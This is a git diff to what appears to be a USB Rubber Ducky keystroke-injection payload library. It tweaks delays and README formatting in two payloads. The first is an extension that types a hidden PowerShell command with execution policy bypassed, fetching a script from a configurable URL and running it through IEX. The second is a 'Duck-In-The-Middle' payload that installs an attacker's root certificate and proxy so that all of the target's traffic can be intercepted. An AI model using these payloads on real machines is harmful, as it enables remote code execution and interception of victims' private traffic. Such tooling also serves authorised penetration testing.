diff --git a/payloads/extensions/community/RUN_HOSTED_POWERSHELL b/payloads/extensions/community/RUN_HOSTED_POWERSHELL index 05863ad..5c15895 100644 --- a/payloads/extensions/community/RUN_HOSTED_POWERSHELL +++ b/payloads/extensions/community/RUN_HOSTED_POWERSHELL @@ -16,6 +16,7 @@ EXTENSION RUN_HOSTED_POWERSHELL DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE GUI r + DELAY #RHP_DELAY STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX" @@ -26,7 +27,7 @@ EXTENSION RUN_HOSTED_POWERSHELL END_IF_DEFINED ENTER - + IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION ATTACKMODE OFF END_IF_DEFINED diff --git a/payloads/library/execution/Windows-Duck-In-The-Middle/README.md b/payloads/library/execution/Windows-Duck-In-The-Middle/README.md index 20750e3..05ea995 100644 --- a/payloads/library/execution/Windows-Duck-In-The-Middle/README.md +++ b/payloads/library/execution/Windows-Duck-In-The-Middle/README.md @@ -2,17 +2,19 @@

- View on: Payload Studio + VIEW ON: HAK5 PAYLOADSTUDIO - Target: Windows 10, 11 + TARGET: WINDOWS 10, 11 + + + VERSION: 1.0

This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). After executing your payload, the proxy server will intercept all the target user's network traffic. -
-Payload operation +## Process 1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows. 2. Creates a new virtual desktop. @@ -26,16 +28,15 @@ This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-mi 6. Closes the virtual desktop. 7. *Disables USB Rubber Ducky* -> Note: No configuration is required for Chromium-based browsers since they accept user root certificates by default. - -
+> [!NOTE] +> No configuration is required for Chromium-based browsers since they accept user root certificates by default. ## Prerequisites -To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). -The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org) or [Burp Suite](https://portswigger.net/burp). +To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com/). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org/) or [Burp Suite](https://portswigger.net/burp). -> Note: To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy. +> [!WARNING] +> To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy. ## Options @@ -55,4 +56,4 @@ The certificate must be downloadable from a website, either from your proxy serv ## Contributors -- [@PlumpyTurkey](https://github.com/PlumpyTurkey) +- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey) diff --git a/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt b/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt index f14402b..2e7cfec 100644 --- a/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt +++ b/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt @@ -85,8 +85,10 @@ END_EXTENSION CTRL GUI d GUI x + DELAY #SHORT_DELAY STRING i + DELAY #MEDIUM_DELAY STRING_POWERSHELL Clear-Host; @@ -117,12 +119,16 @@ STRING_POWERSHELL exit } END_STRING + ENTER + DELAY #LONG_DELAY ALT TAB + DELAY #SHORT_DELAY TAB ENTER + CTRL GUI F4 IF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION